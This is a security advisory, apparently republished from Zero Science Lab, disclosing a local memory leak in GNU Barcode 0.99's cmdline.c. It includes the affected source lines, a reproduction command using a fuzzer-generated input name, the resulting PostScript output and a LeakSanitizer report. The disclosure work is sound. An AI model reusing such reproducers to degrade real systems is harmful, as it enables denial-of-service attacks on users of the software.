GNU Barcode 0.99 Memory Leak

2018.05.30
mk LiquidWorm (MK) mk
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

GNU Barcode 0.99 Memory Leak Vendor: The GNU Project | Free Software Foundation, Inc. Product web page: https://www.gnu.org/software/barcode/ https://directory.fsf.org/wiki/Barcode Affected version: 0.99 Summary: GNU Barcode is a tool to convert text strings to printed bars. It supports a variety of standard codes to represent the textual strings and creates postscript output. Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the 'cmdline.c', which can be exploited to cause a memory leak via a specially crafted file. The vulnerability is confirmed in version 0.99. Other versions may also be affected. ================================================================================= cmdline.c: ---------- 128: int commandline(struct commandline *args, int argc, char **argv, 129: char *errorhead) 130: { 131: struct commandline *ptr; 132: char *getopt_desc = (char *)calloc(512, 1); 133: int desc_offset = 0; 134: int opt, retval; 135: char *value; ================================================================================= Tested on: Ubuntu 16.04.4 Vulerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2018-5471 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5471.php 09.12.2017 -- lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128 %!PS-Adobe-2.0 %%Creator: "barcode", libbarcode sample frontend %%DocumentPaperSizes: A4 %%EndComments %%EndProlog %%Page: 1 1 % Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled 1.00, encoded using "code 128-B" % The space/bar succession is represented by the following widths (space first): % 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112 [ % height xpos ypos width height xpos ypos width [75.00 11.00 15.00 1.85] [75.00 13.50 15.00 0.85] [75.00 16.50 15.00 0.85] [70.00 21.50 20.00 0.85] [70.00 27.00 20.00 3.85] [70.00 30.50 20.00 0.85] [70.00 32.50 20.00 0.85] [70.00 35.50 20.00 2.85] [70.00 40.00 20.00 1.85] [70.00 43.50 20.00 0.85] [70.00 48.50 20.00 0.85] [70.00 51.00 20.00 1.85] [70.00 54.50 20.00 0.85] [70.00 57.50 20.00 0.85] [70.00 62.00 20.00 3.85] [70.00 65.50 20.00 0.85] [70.00 68.50 20.00 0.85] [70.00 71.00 20.00 1.85] [70.00 76.50 20.00 0.85] [70.00 80.00 20.00 3.85] [70.00 84.50 20.00 0.85] [70.00 87.50 20.00 0.85] [70.00 91.00 20.00 1.85] [70.00 96.50 20.00 0.85] [70.00 98.50 20.00 0.85] [70.00 101.00 20.00 1.85] [70.00 104.50 20.00 0.85] [70.00 109.50 20.00 0.85] [70.00 113.00 20.00 3.85] [70.00 117.50 20.00 0.85] [70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85] [70.00 128.00 20.00 1.85] [70.00 131.50 20.00 0.85] [70.00 137.00 20.00 1.85] [70.00 139.50 20.00 0.85] [70.00 142.50 20.00 0.85] [70.00 147.50 20.00 0.85] [70.00 151.00 20.00 1.85] [70.00 154.50 20.00 2.85] [70.00 158.50 20.00 0.85] [70.00 162.00 20.00 1.85] [70.00 164.50 20.00 0.85] [70.00 168.50 20.00 2.85] [70.00 172.00 20.00 1.85] [70.00 175.50 20.00 0.85] [70.00 179.50 20.00 2.85] [70.00 183.00 20.00 1.85] [70.00 186.50 20.00 0.85] [70.00 190.50 20.00 2.85] [70.00 194.00 20.00 1.85] [70.00 197.50 20.00 0.85] [70.00 201.50 20.00 2.85] [70.00 205.00 20.00 1.85] [70.00 209.00 20.00 1.85] [70.00 212.50 20.00 0.85] [70.00 215.50 20.00 2.85] [70.00 220.00 20.00 1.85] [70.00 223.50 20.00 0.85] [70.00 227.50 20.00 2.85] [70.00 230.50 20.00 0.85] [70.00 233.00 20.00 1.85] [70.00 237.50 20.00 2.85] [70.00 241.50 20.00 0.85] [70.00 245.00 20.00 3.85] [70.00 249.50 20.00 0.85] [70.00 252.50 20.00 0.85] [70.00 258.00 20.00 1.85] [70.00 260.50 20.00 0.85] [70.00 263.50 20.00 0.85] [70.00 267.00 20.00 1.85] [70.00 269.50 20.00 0.85] [70.00 275.50 20.00 2.85] [70.00 279.50 20.00 0.85] [70.00 283.00 20.00 1.85] [70.00 285.50 20.00 0.85] [70.00 289.50 20.00 2.85] [70.00 293.00 20.00 1.85] [70.00 297.00 20.00 1.85] [70.00 301.50 20.00 2.85] [70.00 304.50 20.00 0.85] [70.00 307.50 20.00 0.85] [70.00 310.00 20.00 1.85] [70.00 314.50 20.00 2.85] [70.00 318.50 20.00 0.85] [70.00 322.00 20.00 3.85] [70.00 326.50 20.00 0.85] [70.00 329.50 20.00 0.85] [70.00 332.50 20.00 0.85] [70.00 337.00 20.00 3.85] [70.00 340.50 20.00 0.85] [70.00 345.50 20.00 0.85] [70.00 348.00 20.00 1.85] [70.00 352.50 20.00 2.85] [70.00 356.50 20.00 0.85] [70.00 360.00 20.00 1.85] [70.00 362.50 20.00 0.85] [70.00 366.50 20.00 2.85] [70.00 370.00 20.00 1.85] [70.00 373.50 20.00 0.85] [70.00 377.50 20.00 2.85] [70.00 381.00 20.00 1.85] [70.00 384.50 20.00 0.85] [70.00 388.50 20.00 2.85] [70.00 392.00 20.00 1.85] [70.00 395.50 20.00 0.85] [70.00 399.50 20.00 2.85] [70.00 403.00 20.00 1.85] [70.00 406.50 20.00 0.85] [70.00 410.50 20.00 2.85] [70.00 414.00 20.00 1.85] [70.00 417.50 20.00 0.85] [70.00 421.50 20.00 2.85] [70.00 425.00 20.00 1.85] [70.00 428.50 20.00 0.85] [70.00 431.00 20.00 1.85] [70.00 435.50 20.00 2.85] [70.00 439.50 20.00 0.85] [70.00 445.00 20.00 3.85] [70.00 448.50 20.00 0.85] [70.00 450.50 20.00 0.85] [70.00 452.50 20.00 0.85] [70.00 457.00 20.00 3.85] [70.00 462.50 20.00 2.85] [70.00 466.50 20.00 0.85] [70.00 470.00 20.00 1.85] [70.00 472.50 20.00 0.85] [70.00 476.00 20.00 1.85] [70.00 481.50 20.00 0.85] [70.00 483.50 20.00 0.85] [70.00 486.50 20.00 0.85] [70.00 489.00 20.00 1.85] [70.00 496.00 20.00 3.85] [70.00 499.50 20.00 0.85] [70.00 502.50 20.00 0.85] [70.00 505.50 20.00 0.85] [70.00 511.00 20.00 3.85] [70.00 514.50 20.00 0.85] [70.00 516.50 20.00 0.85] [70.00 521.50 20.00 0.85] [70.00 524.00 20.00 1.85] [70.00 527.50 20.00 0.85] [70.00 530.00 20.00 1.85] [70.00 534.50 20.00 2.85] [70.00 538.50 20.00 0.85] [70.00 541.50 20.00 0.85] [70.00 546.00 20.00 3.85] [70.00 549.50 20.00 0.85] [70.00 552.00 20.00 1.85] [70.00 555.50 20.00 0.85] [70.00 560.50 20.00 0.85] [70.00 562.50 20.00 0.85] [70.00 567.00 20.00 3.85] [70.00 572.50 20.00 2.85] [70.00 576.50 20.00 0.85] [70.00 580.00 20.00 1.85] [70.00 582.50 20.00 0.85] [70.00 586.50 20.00 2.85] [70.00 591.00 20.00 1.85] [70.00 594.00 20.00 1.85] [70.00 598.50 20.00 2.85] [70.00 602.50 20.00 0.85] [70.00 605.50 20.00 2.85] [70.00 608.50 20.00 0.85] [70.00 612.00 20.00 1.85] [70.00 615.50 20.00 0.85] [70.00 620.00 20.00 1.85] [70.00 622.50 20.00 0.85] [75.00 627.00 15.00 1.85] [75.00 632.50 15.00 2.85] [75.00 635.50 15.00 0.85] [75.00 638.00 15.00 1.85] ] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall [ % char xpos ypos fontsize [(o) 21.00 10.00 12.00] [(/) 32.00 10.00 0.00] [(c) 43.00 10.00 0.00] [(r) 54.00 10.00 0.00] [(a) 65.00 10.00 0.00] [(s) 76.00 10.00 0.00] [(h) 87.00 10.00 0.00] [(e) 98.00 10.00 0.00] [(s) 109.00 10.00 0.00] [(/) 120.00 10.00 0.00] [(i) 131.00 10.00 0.00] [(d) 142.00 10.00 0.00] [(:) 153.00 10.00 0.00] [(0) 164.00 10.00 0.00] [(0) 175.00 10.00 0.00] [(0) 186.00 10.00 0.00] [(0) 197.00 10.00 0.00] [(3) 208.00 10.00 0.00] [(4) 219.00 10.00 0.00] [(,) 230.00 10.00 0.00] [(s) 241.00 10.00 0.00] [(i) 252.00 10.00 0.00] [(g) 263.00 10.00 0.00] [(:) 274.00 10.00 0.00] [(0) 285.00 10.00 0.00] [(6) 296.00 10.00 0.00] [(,) 307.00 10.00 0.00] [(s) 318.00 10.00 0.00] [(r) 329.00 10.00 0.00] [(c) 340.00 10.00 0.00] [(:) 351.00 10.00 0.00] [(0) 362.00 10.00 0.00] [(0) 373.00 10.00 0.00] [(0) 384.00 10.00 0.00] [(0) 395.00 10.00 0.00] [(0) 406.00 10.00 0.00] [(0) 417.00 10.00 0.00] [(,) 428.00 10.00 0.00] [(o) 439.00 10.00 0.00] [(p) 450.00 10.00 0.00] [(:) 461.00 10.00 0.00] [(h) 472.00 10.00 0.00] [(a) 483.00 10.00 0.00] [(v) 494.00 10.00 0.00] [(o) 505.00 10.00 0.00] [(c) 516.00 10.00 0.00] [(,) 527.00 10.00 0.00] [(r) 538.00 10.00 0.00] [(e) 549.00 10.00 0.00] [(p) 560.00 10.00 0.00] [(:) 571.00 10.00 0.00] [(1) 582.00 10.00 0.00] [(2) 593.00 10.00 0.00] [(8) 604.00 10.00 0.00] ] { {} forall dup 0.00 ne { /Helvetica findfont exch scalefont setfont } {pop} ifelse moveto show} bind forall % End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128" showpage %%Trailer ================================================================= ==2183==ERROR: LeakSanitizer: detected memory leaks Direct leak of 512 byte(s) in 1 object(s) allocated from: #0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a) #1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132 Direct leak of 55 byte(s) in 1 object(s) allocated from: #0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489) SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).

References:

https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5471.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top